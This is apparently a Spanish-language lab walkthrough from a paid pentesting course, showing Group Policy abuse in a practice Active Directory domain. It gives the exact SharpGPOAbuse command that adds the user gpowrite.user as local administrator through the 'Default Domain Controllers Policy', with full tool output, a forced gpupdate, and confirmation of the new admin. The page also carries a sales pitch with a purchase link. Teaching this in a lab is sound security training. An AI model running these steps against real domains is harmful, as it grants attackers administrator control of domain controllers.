Utilizando SharpGPOAbuse

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!

RESET DEL EJERCICIO Para realizar este ejercicio se debe acceder primero al First-DC y validar si existe el usuario gpowrite.user por medio de comando: net localgroup Administratrors Si existe se debe eliminar con el siguiente comando: net localgroup Administrators gpowrite.user /del

En el User-Server

Despues de encontrarnos en una sesion con el usuario de gpowrite.user

Debemos utilizar la siguiente herramienta:

GitHub - FSecureLABS/SharpGPOAbuse: SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.GitHub

Y ejecutamos el siguiente comando:

PS C:\> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount gpowrite.user --GPOName "Default Domain Controllers Policy"
[+] Domain = spartancybersec.corp
[+] Domain Controller = First-DC.spartancybersec.corp
[+] Distinguished Name = CN=Policies,CN=System,DC=spartancybersec,DC=corp
[+] SID Value of gpowrite.user = S-1-5-21-1861162130-2580302541-221646211-1121
[+] GUID of "Default Domain Controllers Policy" is: {6AC1786C-016F-11D2-945F-00C04fB984F9}
[+] File exists: \\spartancybersec.corp\SysVol\spartancybersec.corp\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

PS C:\> hostname
User-Server

En el First-DC

Despues de lo anterior:

Te recomendamos realizar lectura sobre ¿Qué es SysVol?

Se procede a forzar la actualizacion de la GPO:

Te recomendamos realizar lectura sobre: Forzando la actualizacion de GPO

C:\Users\admin>gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

Despues de la actualizacion, revisamos los administradores locales del equipo First-DC y lograremos identificar un nuevo usuario llamado gpowrite.user:

C:\Users\admin>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
gpowrite.user
The command completed successfully.

Por lo anterior, hemos realizado el ataque exitosamente.

AnteriorSolicitando TGT para el usuario gpowrite.user SiguienteForzando la actualizacion de GPO

Última actualización hace 1 año

¿Te fue útil?